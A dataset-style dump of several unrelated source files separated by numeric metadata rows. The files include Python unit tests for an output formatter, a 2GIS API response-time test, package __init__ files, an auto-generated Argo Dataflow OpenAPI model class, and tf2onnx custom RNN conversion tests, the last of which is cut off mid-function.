expected = u'\tFinish analyzing fake-app-name.'
self._output.close_application_data('fake-app-name')
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_cvs_format_close_application_data_to_string(self):
expected = u''
self._output.set_format('csv')
self._output.close_application_data('fake-app-name')
self.assertEqual(self._output._row, expected)
def test_console_format_write_footer_to_stdout_with_SUCCESS_style(self):
expected = u'End checking view access.'
self._output.write_footer()
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_cvs_format_write_footer_to_string(self):
expected = u'\n'
self._output.set_format('csv')
self._output.write_footer()
self.assertEqual(self._output._row, expected)
| 40.453802 | 85 | 0.661607 | 6,086 | 49,475 | 5.007394 | 0.048308 | 0.054471 | 0.033667 | 0.04187 | 0.844594 | 0.803774 | 0.76653 | 0.738113 | 0.702215 | 0.680558 | 0 | 0.004132 | 0.241839 | 49,475 | 1,222 | 86 | 40.486907 | 0.808318 | 0.009581 | 0 | 0.662439 | 0 | 0.001951 | 0.162688 | 0.065692 | 0 | 0 | 0 | 0 | 0.136585 | 1 | 0.142439 | false | 0.006829 | 0.01561 | 0 | 0.182439 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
e6990f7310e89eaf51795fa05ea2ca52396ff9f9
| 161 |
py
|
Python
|
utils/__init__.py
|
wang97zh/EVS-Net-1
|
3a8457c2d5281b8805ec523f9ced738ccf49d5f5
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
wang97zh/EVS-Net-1
|
3a8457c2d5281b8805ec523f9ced738ccf49d5f5
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
wang97zh/EVS-Net-1
|
3a8457c2d5281b8805ec523f9ced738ccf49d5f5
|
[
"MIT"
] | null | null | null |
from .utility import *
from .tricks import *
from .tensorlog import *
from .self_op import *
from .resume import *
from .optims import *
from .metric import *
| 16.1 | 24 | 0.726708 | 22 | 161 | 5.272727 | 0.454545 | 0.517241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186335 | 161 | 9 | 25 | 17.888889 | 0.885496 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
fc0db1d4c1d538c8a8da3398414e346edd37ebe8
| 166 |
py
|
Python
|
client/checkout/schema/types.py
|
daniel-waruo/e-commerse-api
|
6b080039398fb4099a34335317d649dd67783f63
|
[
"Apache-2.0"
] | 6 |
2019-11-21T10:09:49.000Z
|
2021-06-19T09:52:59.000Z
|
client/checkout/schema/types.py
|
daniel-waruo/e-commerse-api
|
6b080039398fb4099a34335317d649dd67783f63
|
[
"Apache-2.0"
] | null | null | null |
client/checkout/schema/types.py
|
daniel-waruo/e-commerse-api
|
6b080039398fb4099a34335317d649dd67783f63
|
[
"Apache-2.0"
] | null | null | null |
import graphene
from graphene_django import DjangoObjectType
from graphene_django.converter import convert_django_field
from pyuploadcare.dj.models import ImageField
| 33.2 | 58 | 0.89759 | 21 | 166 | 6.904762 | 0.571429 | 0.165517 | 0.248276 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084337 | 166 | 4 | 59 | 41.5 | 0.953947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
fc321e4d24702ee71bce5b7e534a97061ead9698
| 2,950 |
py
|
Python
|
tests/test_01_accept_time_get_headers.py
|
glushkovvv/test_2gis
|
2affff49411a3c7ff77e9d399ec86eb314aa3757
|
[
"MIT"
] | null | null | null |
tests/test_01_accept_time_get_headers.py
|
glushkovvv/test_2gis
|
2affff49411a3c7ff77e9d399ec86eb314aa3757
|
[
"MIT"
] | 1 |
2020-08-05T06:27:23.000Z
|
2020-08-05T06:27:42.000Z
|
tests/test_01_accept_time_get_headers.py
|
glushkovvv/test_2gis
|
2affff49411a3c7ff77e9d399ec86eb314aa3757
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
test_01_accept_time_get_headers
~~~~~~~~~~~~~~
The 2GIS API Test
Check time get headers
:author: Vadim Glushkov
:copyright: Copyright 2019, The2GIS API Test"
:license: MIT
:version: 1.0.0
:maintainer: Vadim Glushkov
:email: plussg@yandex.ru
:status: Development
"""
import pytest
import allure
from tools.api_responses import get_response
@allure.epic("Поизитивные тесты API")
@allure.suite("Позитивное тестирование время ответов")
@allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке")
@pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 5},
{"country_code": "ru", "page": 1, "page_size": 5},
{"q": "ОРСК"}])
def test_01_time_response_for_valid_request(setup_option, json_params):
"""
Проверяем время ответов сервера при валидных запросах
:param setup_option: Установочные параметры
:type setup_option: dict
:param json_params: Параметры GET запроса
:type json_params: dict
:return:
"""
api_url = setup_option['site_url']
request_params = json_params
api_response = get_response(api_url, request_params)
testing_message = (f" EndPoint: {api_response.url}\n"
f" Status: {api_response.status_code}\n"
f" Headers: {api_response.headers}\n"
f" Content: {api_response.content}")
check = api_response.elapsed.total_seconds() <= 0.2
assert check, f"""Время ответа {api_response.elapsed.total_seconds()} больше 0.2 сек\r\n""" + testing_message
@allure.epic("Смок тесты API")
@allure.suite("Позитивное тестирование время ответов")
@allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке")
@pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 2},
{"country_code": "tz", "page": 1, "page_size": 5},
{"q": "ОР"}])
def test_01_time_response_for_invalid_request(setup_option, json_params):
"""
Проверяем время ответов сервера при невалидных запросах
:param setup_option: Установочные параметры
:type setup_option: dict
:param json_params: Параметры GET запроса
:type json_params: dict
:return:
"""
api_url = setup_option['site_url']
request_params = json_params
api_response = get_response(api_url, request_params)
testing_message = (f" EndPoint: {api_response.url}\n"
f" Status: {api_response.status_code}\n"
f" Headers: {api_response.headers}\n"
f" Content: {api_response.content}")
check = api_response.elapsed.total_seconds() <= 0.5
assert check, f"""Время ответа {api_response.elapsed.total_seconds()} больше 0.5 сек\r\n""" + testing_message
| 38.815789 | 116 | 0.649831 | 364 | 2,950 | 5.049451 | 0.293956 | 0.083787 | 0.019587 | 0.028292 | 0.800326 | 0.779108 | 0.73667 | 0.73667 | 0.73667 | 0.73667 | 0 | 0.014141 | 0.232881 | 2,950 | 75 | 117 | 39.333333 | 0.798056 | 0.231864 | 0 | 0.514286 | 0 | 0 | 0.391682 | 0.102377 | 0 | 0 | 0 | 0 | 0.057143 | 1 | 0.057143 | false | 0 | 0.085714 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
fc526e31f18c99d7210b6012a52b4a8ccf202ae9
| 35 |
py
|
Python
|
instascrape/collectors/__init__.py
|
Paola351/instascrape
|
b4a50c9140fa9054187738f6d1564cecc32cbaab
|
[
"MIT"
] | 1 |
2021-03-10T03:36:43.000Z
|
2021-03-10T03:36:43.000Z
|
examples/collectors/__init__.py
|
fo0nikens/instascrape
|
699dd2169a96438d1d71bce5b1401fd5c5f0e531
|
[
"MIT"
] | null | null | null |
examples/collectors/__init__.py
|
fo0nikens/instascrape
|
699dd2169a96438d1d71bce5b1401fd5c5f0e531
|
[
"MIT"
] | null | null | null |
from .interval_collectors import *
| 17.5 | 34 | 0.828571 | 4 | 35 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
fc652ca3b217323de609509cf9bf7a86e05a1571
| 28 |
py
|
Python
|
disrank/__init__.py
|
treehousekingcomic/disrank
|
6a6ef3a2f2d4dc81bc3da8064b897dac4c773ef7
|
[
"MIT"
] | 1 |
2021-05-06T14:46:46.000Z
|
2021-05-06T14:46:46.000Z
|
disrank/__init__.py
|
treehousekingcomic/disrank
|
6a6ef3a2f2d4dc81bc3da8064b897dac4c773ef7
|
[
"MIT"
] | null | null | null |
disrank/__init__.py
|
treehousekingcomic/disrank
|
6a6ef3a2f2d4dc81bc3da8064b897dac4c773ef7
|
[
"MIT"
] | null | null | null |
from thkc_disrank import *
| 14 | 27 | 0.785714 | 4 | 28 | 5.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178571 | 28 | 1 | 28 | 28 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
fc933a1a213897fe8cf98ce98bd1c72358bf800c
| 16,945 |
py
|
Python
|
sdks/python/client/openapi_client/model/github_com_argoproj_labs_argo_dataflow_api_v1alpha1_dedupe.py
|
Siebjee/argo-workflows
|
1a3b87bdf8edba02ba5e5aed20f3942be1d6f46c
|
[
"Apache-2.0"
] | null | null | null |
sdks/python/client/openapi_client/model/github_com_argoproj_labs_argo_dataflow_api_v1alpha1_dedupe.py
|
Siebjee/argo-workflows
|
1a3b87bdf8edba02ba5e5aed20f3942be1d6f46c
|
[
"Apache-2.0"
] | 3 |
2022-02-22T19:39:40.000Z
|
2022-02-28T14:34:19.000Z
|
sdks/python/client/openapi_client/model/github_com_argoproj_labs_argo_dataflow_api_v1alpha1_dedupe.py
|
Siebjee/argo-workflows
|
1a3b87bdf8edba02ba5e5aed20f3942be1d6f46c
|
[
"Apache-2.0"
] | null | null | null |
"""
Argo Server API
You can get examples of requests and responses by using the CLI with `--gloglevel=9`, e.g. `argo list --gloglevel=9` # noqa: E501
The version of the OpenAPI document: VERSION
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from openapi_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from openapi_client.exceptions import ApiAttributeError
def lazy_import():
from openapi_client.model.github_com_argoproj_labs_argo_dataflow_api_v1alpha1_abstract_step import GithubComArgoprojLabsArgoDataflowApiV1alpha1AbstractStep
globals()['GithubComArgoprojLabsArgoDataflowApiV1alpha1AbstractStep'] = GithubComArgoprojLabsArgoDataflowApiV1alpha1AbstractStep
class GithubComArgoprojLabsArgoDataflowApiV1alpha1Dedupe(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'abstract_step': (GithubComArgoprojLabsArgoDataflowApiV1alpha1AbstractStep,), # noqa: E501
'max_size': (str,), # noqa: E501
'uid': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'abstract_step': 'abstractStep', # noqa: E501
'max_size': 'maxSize', # noqa: E501
'uid': 'uid', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""GithubComArgoprojLabsArgoDataflowApiV1alpha1Dedupe - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
abstract_step (GithubComArgoprojLabsArgoDataflowApiV1alpha1AbstractStep): [optional] # noqa: E501
max_size (str): Quantity is a fixed-point representation of a number. It provides convenient marshaling/unmarshaling in JSON and YAML, in addition to String() and AsInt64() accessors. The serialization format is: <quantity> ::= <signedNumber><suffix> (Note that <suffix> may be empty, from the \"\" case in <decimalSI>.) <digit> ::= 0 | 1 | ... | 9 <digits> ::= <digit> | <digit><digits> <number> ::= <digits> | <digits>.<digits> | <digits>. | .<digits> <sign> ::= \"+\" | \"-\" <signedNumber> ::= <number> | <sign><number> <suffix> ::= <binarySI> | <decimalExponent> | <decimalSI> <binarySI> ::= Ki | Mi | Gi | Ti | Pi | Ei (International System of units; See: http://physics.nist.gov/cuu/Units/binary.html) <decimalSI> ::= m | \"\" | k | M | G | T | P | E (Note that 1024 = 1Ki but 1000 = 1k; I didn't choose the capitalization.) <decimalExponent> ::= \"e\" <signedNumber> | \"E\" <signedNumber> No matter which of the three exponent forms is used, no quantity may represent a number greater than 2^63-1 in magnitude, nor may it have more than 3 decimal places. Numbers larger or more precise will be capped or rounded up. (E.g.: 0.1m will rounded up to 1m.) This may be extended in the future if we require larger or smaller quantities. When a Quantity is parsed from a string, it will remember the type of suffix it had, and will use the same type again when it is serialized. Before serializing, Quantity will be put in \"canonical form\". This means that Exponent/suffix will be adjusted up or down (with a corresponding increase or decrease in Mantissa) such that: a. No precision is lost b. No fractional digits will be emitted c. The exponent (or suffix) is as large as possible. The sign will be omitted unless the number is negative. Examples: 1.5 will be serialized as \"1500m\" 1.5Gi will be serialized as \"1536Mi\" Note that the quantity will NEVER be internally represented by a floating point number. That is the whole point of this exercise. Non-canonical values will still parse as long as they are well formed, but will be re-emitted in their canonical form. (So always use canonical form, or don't diff.) This format is intended to make it difficult to use these numbers without writing some sort of special handling code in the hopes that that will cause implementors to also use a fixed point implementation.. [optional] # noqa: E501
uid (str): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""GithubComArgoprojLabsArgoDataflowApiV1alpha1Dedupe - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
abstract_step (GithubComArgoprojLabsArgoDataflowApiV1alpha1AbstractStep): [optional] # noqa: E501
max_size (str): Quantity is a fixed-point representation of a number. It provides convenient marshaling/unmarshaling in JSON and YAML, in addition to String() and AsInt64() accessors. The serialization format is: <quantity> ::= <signedNumber><suffix> (Note that <suffix> may be empty, from the \"\" case in <decimalSI>.) <digit> ::= 0 | 1 | ... | 9 <digits> ::= <digit> | <digit><digits> <number> ::= <digits> | <digits>.<digits> | <digits>. | .<digits> <sign> ::= \"+\" | \"-\" <signedNumber> ::= <number> | <sign><number> <suffix> ::= <binarySI> | <decimalExponent> | <decimalSI> <binarySI> ::= Ki | Mi | Gi | Ti | Pi | Ei (International System of units; See: http://physics.nist.gov/cuu/Units/binary.html) <decimalSI> ::= m | \"\" | k | M | G | T | P | E (Note that 1024 = 1Ki but 1000 = 1k; I didn't choose the capitalization.) <decimalExponent> ::= \"e\" <signedNumber> | \"E\" <signedNumber> No matter which of the three exponent forms is used, no quantity may represent a number greater than 2^63-1 in magnitude, nor may it have more than 3 decimal places. Numbers larger or more precise will be capped or rounded up. (E.g.: 0.1m will rounded up to 1m.) This may be extended in the future if we require larger or smaller quantities. When a Quantity is parsed from a string, it will remember the type of suffix it had, and will use the same type again when it is serialized. Before serializing, Quantity will be put in \"canonical form\". This means that Exponent/suffix will be adjusted up or down (with a corresponding increase or decrease in Mantissa) such that: a. No precision is lost b. No fractional digits will be emitted c. The exponent (or suffix) is as large as possible. The sign will be omitted unless the number is negative. Examples: 1.5 will be serialized as \"1500m\" 1.5Gi will be serialized as \"1536Mi\" Note that the quantity will NEVER be internally represented by a floating point number. That is the whole point of this exercise. Non-canonical values will still parse as long as they are well formed, but will be re-emitted in their canonical form. (So always use canonical form, or don't diff.) This format is intended to make it difficult to use these numbers without writing some sort of special handling code in the hopes that that will cause implementors to also use a fixed point implementation.. [optional] # noqa: E501
uid (str): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| 62.759259 | 2,465 | 0.618353 | 2,041 | 16,945 | 4.976972 | 0.194023 | 0.011813 | 0.014767 | 0.004725 | 0.788443 | 0.786671 | 0.784209 | 0.778697 | 0.778697 | 0.778697 | 0 | 0.012832 | 0.314724 | 16,945 | 269 | 2,466 | 62.992565 | 0.861953 | 0.652995 | 0 | 0.483607 | 0 | 0 | 0.133215 | 0.038287 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04918 | false | 0.016393 | 0.07377 | 0.008197 | 0.221311 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
5d77f5c8748dabbe0cc911d4482f70143a174f14
| 43 |
py
|
Python
|
amocrm_asterisk_ng/crm/amocrm/kernel/calls/call_records/file_converters/core/__init__.py
|
iqtek/amocrn_asterisk_ng
|
429a8d0823b951c855a49c1d44ab0e05263c54dc
|
[
"MIT"
] | null | null | null |
amocrm_asterisk_ng/crm/amocrm/kernel/calls/call_records/file_converters/core/__init__.py
|
iqtek/amocrn_asterisk_ng
|
429a8d0823b951c855a49c1d44ab0e05263c54dc
|
[
"MIT"
] | null | null | null |
amocrm_asterisk_ng/crm/amocrm/kernel/calls/call_records/file_converters/core/__init__.py
|
iqtek/amocrn_asterisk_ng
|
429a8d0823b951c855a49c1d44ab0e05263c54dc
|
[
"MIT"
] | null | null | null |
from .IFileConverter import IFileConverter
| 21.5 | 42 | 0.883721 | 4 | 43 | 9.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 43 | 1 | 43 | 43 | 0.974359 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
5dd8d749d5dd08650d2aee4a619e3e875e2659a0
| 19,959 |
py
|
Python
|
tests/test_custom_rnncell.py
|
lightmatter-ai/tensorflow-onnx
|
a08aa32e211b859e8a437c5d8a822ea55c46e7c6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_custom_rnncell.py
|
lightmatter-ai/tensorflow-onnx
|
a08aa32e211b859e8a437c5d8a822ea55c46e7c6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_custom_rnncell.py
|
lightmatter-ai/tensorflow-onnx
|
a08aa32e211b859e8a437c5d8a822ea55c46e7c6
|
[
"Apache-2.0"
] | 1 |
2021-05-11T21:51:52.000Z
|
2021-05-11T21:51:52.000Z
|
# SPDX-License-Identifier: Apache-2.0
"""Unit Tests for custom rnns."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import init_ops
from backend_test_base import Tf2OnnxBackendTestBase
from common import * # pylint: disable=wildcard-import, unused-wildcard-import
from tf2onnx.tf_loader import is_tf2
# pylint: disable=missing-docstring,invalid-name,unused-argument,using-constant-test
# pylint: disable=abstract-method,arguments-differ
if is_tf2():
BasicLSTMCell = tf.compat.v1.nn.rnn_cell.BasicLSTMCell
LSTMCell = tf.compat.v1.nn.rnn_cell.LSTMCell
GRUCell = tf.compat.v1.nn.rnn_cell.GRUCell
RNNCell = tf.compat.v1.nn.rnn_cell.RNNCell
MultiRNNCell = tf.compat.v1.nn.rnn_cell.MultiRNNCell
dynamic_rnn = tf.compat.v1.nn.dynamic_rnn
bidirectional_dynamic_rnn = tf.compat.v1.nn.bidirectional_dynamic_rnn
else:
LSTMBlockCell = tf.contrib.rnn.LSTMBlockCell
LSTMCell = tf.nn.rnn_cell.LSTMCell
GRUCell = tf.nn.rnn_cell.LSTMCell
RNNCell = tf.nn.rnn_cell.RNNCell
MultiRNNCell = tf.contrib.rnn.MultiRNNCell
dynamic_rnn = tf.nn.dynamic_rnn
bidirectional_dynamic_rnn = tf.nn.bidirectional_dynamic_rnn
class CustomRnnCellTests(Tf2OnnxBackendTestBase):
@check_opset_min_version(8, "Scan")
@skip_tf2()
def test_single_dynamic_custom_rnn(self):
size = 5 # size of each model layer.
batch_size = 1
cell = GatedGRUCell(size)
x_val = np.array([[1., 1.], [2., 2.], [3., 3.]], dtype=np.float32)
x_val = np.stack([x_val] * batch_size)
def func(x):
xs, s = dynamic_rnn(cell=cell, dtype=tf.float32, inputs=x, time_major=False)
return tf.identity(xs, name="output"), tf.identity(s, name="final_state")
feed_dict = {"input_1:0": x_val}
input_names_with_port = ["input_1:0"]
output_names_with_port = ["output:0", "final_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, 0.1)
@check_opset_min_version(8, "Scan")
@skip_tf2()
def test_single_dynamic_custom_rnn_time_major(self):
size = 5 # size of each model layer.
batch_size = 1
x_val = np.array([[1., 1.], [2., 2.], [3., 3.]], dtype=np.float32)
x_val = np.stack([x_val] * batch_size)
def func(x):
cell = GatedGRUCell(size)
xs, s = dynamic_rnn(cell=cell, dtype=tf.float32, inputs=x, time_major=True)
return tf.identity(xs, name="output"), tf.identity(s, name="final_state")
feed_dict = {"input_1:0": x_val}
input_names_with_port = ["input_1:0"]
output_names_with_port = ["output:0", "final_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, 0.1)
@check_opset_min_version(8, "Scan")
@skip_tf2()
def test_single_dynamic_custom_rnn_with_seq_length(self):
units = 5
batch_size = 6
x_val = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.], [5., 5.]], dtype=np.float32)
x_val = np.stack([x_val] * batch_size)
def func(x):
# no scope
cell = GatedGRUCell(units)
outputs, cell_state = dynamic_rnn(
cell,
x,
dtype=tf.float32,
sequence_length=[4, 3, 4, 5, 2, 1])
return tf.identity(outputs, name="output"), tf.identity(cell_state, name="cell_state")
feed_dict = {"input_1:0": x_val}
input_names_with_port = ["input_1:0"]
output_names_with_port = ["output:0", "cell_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, rtol=1e-06)
@check_opset_min_version(8, "Scan")
@skip_tf2()
def test_single_dynamic_custom_rnn_with_non_const_seq_length(self):
units = 5
batch_size = 6
x_val = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.], [5., 5.]], dtype=np.float32)
x_val = np.stack([x_val] * batch_size)
y_val = np.array([4, 3, 4, 5, 2, 1], dtype=np.int32)
def func(x, seq_length):
# no scope
cell = GatedGRUCell(units)
outputs, cell_state = dynamic_rnn(
cell,
x,
dtype=tf.float32,
sequence_length=tf.identity(seq_length))
return tf.identity(outputs, name="output"), tf.identity(cell_state, name="cell_state")
feed_dict = {"input_1:0": x_val, "input_2:0": y_val}
input_names_with_port = ["input_1:0", "input_2:0"]
output_names_with_port = ["output:0", "cell_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, rtol=1e-06)
@check_opset_min_version(8, "Scan")
@check_tf_min_version("1.8")
@skip_tf2()
def test_attention_wrapper_const_encoder(self):
size = 5
time_step = 3
input_size = 4
attn_size = size
batch_size = 9
# shape [batch size, time step, size]
# attention_state: usually the output of an RNN encoder.
# This tensor should be shaped `[batch_size, max_time, ...]`.
decoder_time_step = 6
x_val = np.random.randn(decoder_time_step, input_size).astype('f')
